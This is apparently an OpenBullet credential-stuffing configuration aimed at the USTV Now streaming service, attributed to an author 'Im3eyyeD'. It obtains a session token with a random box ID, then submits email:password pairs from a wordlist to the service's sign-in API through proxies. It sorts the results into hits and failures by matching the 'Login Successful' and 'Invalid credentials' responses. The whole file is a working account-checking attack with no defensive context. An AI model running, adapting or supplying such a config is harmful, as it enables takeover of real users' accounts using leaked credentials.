[SETTINGS]
{
  "Name": "USTV Now",
  "SuggestedBots": 85,
  "MaxCPM": 0,
  "LastModified": "2022-04-10T15:50:43.5350965+04:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Im3eyyeD",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
BEGIN SCRIPT JavaScript
function uuidv4() {
  return 'xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx'.replace(/[xy]/g, function(c) {
    var r = Math.random() * 16 | 0, v = c == 'x' ? r : (r & 0x3 | 0x8);
    return v.toString(16);
  });
}
var boxid = uuidv4();
END SCRIPT -> VARS "boxid"

REQUEST GET "https://teleupapi.revlet.net/service/api/v1/get/token?tenant_code=ustvnow&box_id=<boxid>&product=ustvnow&device_id=5&display_lang_code=ENG&device_sub_type=&timezone=UTC" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" JSON "sessionId" -> VAR "sessionId" 

REQUEST POST "https://teleupapi.revlet.net/service/api/auth/signin" 
  CONTENT "{\\n  \"login_id\": \"<USER>\",\\n  \"login_key\": \"<PASS>\",\\n  \"login_mode\": 1,\\n  \"manufacturer\": \"123\"\\n}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: teleupapi.revlet.net" 
  HEADER "Connection: keep-alive" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "tenant-code: ustvnow" 
  HEADER "Origin: https://www.ustvnow.com" 
  HEADER "Referer: https://www.ustvnow.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9,fa;q=0.8,fr;q=0.7,ru;q=0.6" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Length: 109" 
  HEADER "session-id: <sessionId>" 
  HEADER "box-id: <boxid>" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Email is not registered." 
    KEY "Invalid credentials." 
  KEYCHAIN Success OR 
    KEY "Login Successful." 

